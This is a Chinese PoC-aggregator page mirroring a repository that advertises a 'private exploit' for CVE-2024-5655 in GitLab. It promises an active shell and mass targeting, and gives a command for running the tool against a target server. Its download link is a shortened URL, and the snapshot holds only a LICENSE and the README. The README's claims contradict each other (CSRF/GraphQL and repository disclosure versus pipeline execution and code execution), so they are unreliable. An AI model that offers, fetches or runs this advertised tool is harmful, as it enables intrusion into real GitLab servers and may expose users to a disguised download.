关联漏洞
标题:
GitLab 访问控制错误漏洞
(CVE-2024-5655)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 GitLab EE 存在访问控制错误漏洞。攻击者利用该漏洞可以在某些情况下以其他用户的身份触发pipeline。
描述
Private exploit CVE-2024-5655 to Gitlab (Private repositories disclosure)
介绍
# CVE-2024-5655-Gitlab-CSRF-GraphQL
Private exploit CVE-2024-5655 to Gitlab (Private repositories disclosure)
> The repository provides a working variant of the CVE-2024-5655 vulnerability exploit with support for real-time active shell, multithreading, entering targets from a file, and color output.
## 🔥 **CVSS: 9.6/10**
## Description
CVE-2024-5655 is a critical vulnerability in GitLab that allows attackers to execute CI/CD pipelines as any user, under specific conditions. This issue affects various versions of GitLab and has been addressed in the latest updates.
## Exploit details
The vulnerability enables unauthorized execution of CI/CD pipelines, potentially leading to remote code execution and other malicious activities.
## Running instructions
To run the exploit, use the following command:
```bash
python3 cve-2024-5655.py -t https://gitlab-private-repo -c 'cat README.md'
```
Before running the exploit, please refer to the README.txt file in the repository for detailed instructions.
## Vulnerable versions:
Various versions of GitLab before the latest security patch.
## Download
[Download here](https://t.ly/chSw3) (securely!)
## Date of published: 03.07.2024
## Contact
vulnresearcher@exploit.in
文件快照
[4.0K] /data/pocs/7fcc0f760f65db4b5c0e2002b1d7a39ddf92d60c
├── [1.0K] LICENSE
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。